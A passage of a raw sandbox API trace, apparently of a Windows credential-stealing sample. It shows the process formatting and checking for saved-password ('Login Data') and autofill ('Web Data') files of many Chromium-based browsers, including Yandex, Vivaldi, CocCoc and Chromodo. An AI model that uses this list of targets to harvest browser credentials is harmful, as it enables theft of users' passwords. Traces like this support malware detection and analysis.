RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0171.208] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.209] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 85 [0171.209] GetProcessHeap () returned 0x840000 [0171.209] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x874b58 [0171.209] GetProcessHeap () returned 0x840000 [0171.209] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.210] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0 [0171.211] GetProcessHeap () returned 0x840000 [0171.211] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0171.211] GetProcessHeap () returned 0x840000 [0171.211] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0171.211] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.212] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 83 [0171.212] GetProcessHeap () returned 0x840000 [0171.213] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xaa) returned 0x874b50 [0171.213] GetProcessHeap () returned 0x840000 [0171.213] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.213] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 0 [0171.214] GetProcessHeap () returned 0x840000 [0171.214] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0171.214] GetProcessHeap () returned 0x840000 [0171.214] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0171.214] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.215] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 66 [0171.215] GetProcessHeap () returned 0x840000 [0171.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x88) returned 0x874b30 [0171.215] GetProcessHeap () returned 0x840000 [0171.215] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.216] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 0 [0171.216] GetProcessHeap () returned 0x840000 [0171.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0171.216] GetProcessHeap () returned 0x840000 [0171.216] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0171.217] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.218] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 74 [0171.218] GetProcessHeap () returned 0x840000 [0171.218] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x98) returned 0x874b40 [0171.218] GetProcessHeap () returned 0x840000 [0171.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.219] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 0 [0171.219] GetProcessHeap () returned 0x840000 [0171.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0171.219] GetProcessHeap () returned 0x840000 [0171.219] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0171.220] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.350] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 85 [0171.350] GetProcessHeap () returned 0x840000 [0171.350] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x874b58 [0171.350] GetProcessHeap () returned 0x840000 [0171.350] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.352] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0171.393] GetProcessHeap () returned 0x840000 [0171.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0171.393] GetProcessHeap () returned 0x840000 [0171.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0171.394] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.395] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 83 [0171.395] GetProcessHeap () returned 0x840000 [0171.395] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xaa) returned 0x874b50 [0171.395] GetProcessHeap () returned 0x840000 [0171.395] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.396] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 0 [0171.397] GetProcessHeap () returned 0x840000 [0171.397] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0171.397] GetProcessHeap () returned 0x840000 [0171.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0171.398] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.406] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 66 [0171.406] GetProcessHeap () returned 0x840000 [0171.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x88) returned 0x874b30 [0171.406] GetProcessHeap () returned 0x840000 [0171.406] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.407] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 0 [0171.407] GetProcessHeap () returned 0x840000 [0171.407] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0171.407] GetProcessHeap () returned 0x840000 [0171.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0171.408] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.409] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 74 [0171.409] GetProcessHeap () returned 0x840000 [0171.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x98) returned 0x874b40 [0171.409] GetProcessHeap () returned 0x840000 [0171.409] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.410] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 0 [0171.411] GetProcessHeap () returned 0x840000 [0171.411] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0171.411] GetProcessHeap () returned 0x840000 [0171.411] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0171.412] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.412] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 79 [0171.412] GetProcessHeap () returned 0x840000 [0171.412] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa2) returned 0x874b58 [0171.413] GetProcessHeap () returned 0x840000 [0171.413] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.413] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 0 [0171.414] GetProcessHeap () returned 0x840000 [0171.414] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0171.414] GetProcessHeap () returned 0x840000 [0171.414] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0171.415] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.415] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 77 [0171.415] GetProcessHeap () returned 0x840000 [0171.415] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x9e) returned 0x8628a8 [0171.416] GetProcessHeap () returned 0x840000 [0171.416] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.416] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 0 [0171.417] GetProcessHeap () returned 0x840000 [0171.417] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8628a8 | out: hHeap=0x840000) returned 1 [0171.417] GetProcessHeap () returned 0x840000 [0171.417] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0171.418] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.419] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 60 [0171.419] GetProcessHeap () returned 0x840000 [0171.419] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7c) returned 0x874b30 [0171.419] GetProcessHeap () returned 0x840000 [0171.419] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.420] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 0 [0171.420] GetProcessHeap () returned 0x840000 [0171.420] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0171.420] GetProcessHeap () returned 0x840000 [0171.626] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0171.627] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.628] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 68 [0171.628] GetProcessHeap () returned 0x840000 [0171.628] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8c) returned 0x874b40 [0171.628] GetProcessHeap () returned 0x840000 [0171.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.629] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 0 [0171.630] GetProcessHeap () returned 0x840000 [0171.630] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0171.630] GetProcessHeap () returned 0x840000 [0171.630] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0171.631] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.631] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 72 [0171.632] GetProcessHeap () returned 0x840000 [0171.632] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x94) returned 0x874b58 [0171.632] GetProcessHeap () returned 0x840000 [0171.632] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.637] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0171.637] GetProcessHeap () returned 0x840000 [0171.637] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0171.637] GetProcessHeap () returned 0x840000 [0171.637] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0171.638] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.639] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 70 [0171.639] GetProcessHeap () returned 0x840000 [0171.639] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x90) returned 0x874b50 [0171.639] GetProcessHeap () returned 0x840000 [0171.639] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0171.640] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 0 [0171.640] GetProcessHeap () returned 0x840000 [0171.640] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0171.640] GetProcessHeap () returned 0x840000 [0171.640] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0171.641] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0171.642] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 53 [0171.642] GetProcessHeap () returned 0x840000 [0171.642] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6e) returned 0x874b30 [0171.642] GetProcessHeap () returned 0x840000 [0171.643] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0171.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.030] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 0 [0172.035] GetProcessHeap () returned 0x840000 [0172.035] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0172.035] GetProcessHeap () returned 0x840000 [0172.035] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0172.036] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.037] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 61 [0172.037] GetProcessHeap () returned 0x840000 [0172.037] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7e) returned 0x874b40 [0172.037] GetProcessHeap () returned 0x840000 [0172.037] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.038] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 0 [0172.039] GetProcessHeap () returned 0x840000 [0172.039] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0172.039] GetProcessHeap () returned 0x840000 [0172.039] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0172.043] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.044] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 80 [0172.044] GetProcessHeap () returned 0x840000 [0172.044] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa4) returned 0x874b58 [0172.044] GetProcessHeap () returned 0x840000 [0172.044] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.045] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 0 [0172.045] GetProcessHeap () returned 0x840000 [0172.045] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0172.045] GetProcessHeap () returned 0x840000 [0172.045] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0172.046] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.047] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 78 [0172.047] GetProcessHeap () returned 0x840000 [0172.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa0) returned 0x863520 [0172.047] GetProcessHeap () returned 0x840000 [0172.047] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.048] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 0 [0172.048] GetProcessHeap () returned 0x840000 [0172.048] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x863520 | out: hHeap=0x840000) returned 1 [0172.048] GetProcessHeap () returned 0x840000 [0172.048] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0172.049] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.050] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 61 [0172.050] GetProcessHeap () returned 0x840000 [0172.050] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7e) returned 0x874b30 [0172.050] GetProcessHeap () returned 0x840000 [0172.050] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.051] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 0 [0172.051] GetProcessHeap () returned 0x840000 [0172.051] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b30 | out: hHeap=0x840000) returned 1 [0172.051] GetProcessHeap () returned 0x840000 [0172.051] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0172.052] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.053] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 69 [0172.053] GetProcessHeap () returned 0x840000 [0172.053] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8e) returned 0x874b40 [0172.053] GetProcessHeap () returned 0x840000 [0172.053] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.054] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 0 [0172.054] GetProcessHeap () returned 0x840000 [0172.055] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0172.055] GetProcessHeap () returned 0x840000 [0172.055] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0172.055] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.057] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 74 [0172.057] GetProcessHeap () returned 0x840000 [0172.057] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x98) returned 0x874b58 [0172.057] GetProcessHeap () returned 0x840000 [0172.057] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.058] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 0 [0172.058] GetProcessHeap () returned 0x840000 [0172.058] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b58 | out: hHeap=0x840000) returned 1 [0172.058] GetProcessHeap () returned 0x840000 [0172.058] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x870bc8 [0172.059] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.059] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 72 [0172.059] GetProcessHeap () returned 0x840000 [0172.060] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x94) returned 0x874b50 [0172.060] GetProcessHeap () returned 0x840000 [0172.060] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.061] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 0 [0172.061] GetProcessHeap () returned 0x840000 [0172.061] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b50 | out: hHeap=0x840000) returned 1 [0172.061] GetProcessHeap () returned 0x840000 [0172.061] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x870bc8 [0172.062] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.062] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 55 [0172.062] GetProcessHeap () returned 0x840000 [0172.062] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x861418 [0172.063] GetProcessHeap () returned 0x840000 [0172.063] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.063] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 0 [0172.063] GetProcessHeap () returned 0x840000 [0172.063] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861418 | out: hHeap=0x840000) returned 1 [0172.064] GetProcessHeap () returned 0x840000 [0172.064] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x870bc8 [0172.064] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.065] wvsprintfW (in: param_1=0x870bc8, param_2="%s%s\\Default\\Login Data", arglist=0x19f41c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 63 [0172.065] GetProcessHeap () returned 0x840000 [0172.065] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x874b40 [0172.065] GetProcessHeap () returned 0x840000 [0172.065] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.066] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 0 [0172.066] GetProcessHeap () returned 0x840000 [0172.066] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874b40 | out: hHeap=0x840000) returned 1 [0172.066] GetProcessHeap () returned 0x840000 [0172.066] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f84) returned 0x870bc8 [0172.067] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0172.067] wvsprintfW (in: param_1=0x870bc8, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f420 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 78 [0172.068] GetProcessHeap () returned 0x840000 [0172.068] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa0) returned 0x863520 [0172.068] GetProcessHeap () returned 0x840000 [0172.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870bc8 | out: hHeap=0x840000) returned 1 [0172.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0172.069] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 0 [0172.069] GetProcessHeap () returned 0x840000 [0172.069] HeapFree (in: hHeap=0x840000, 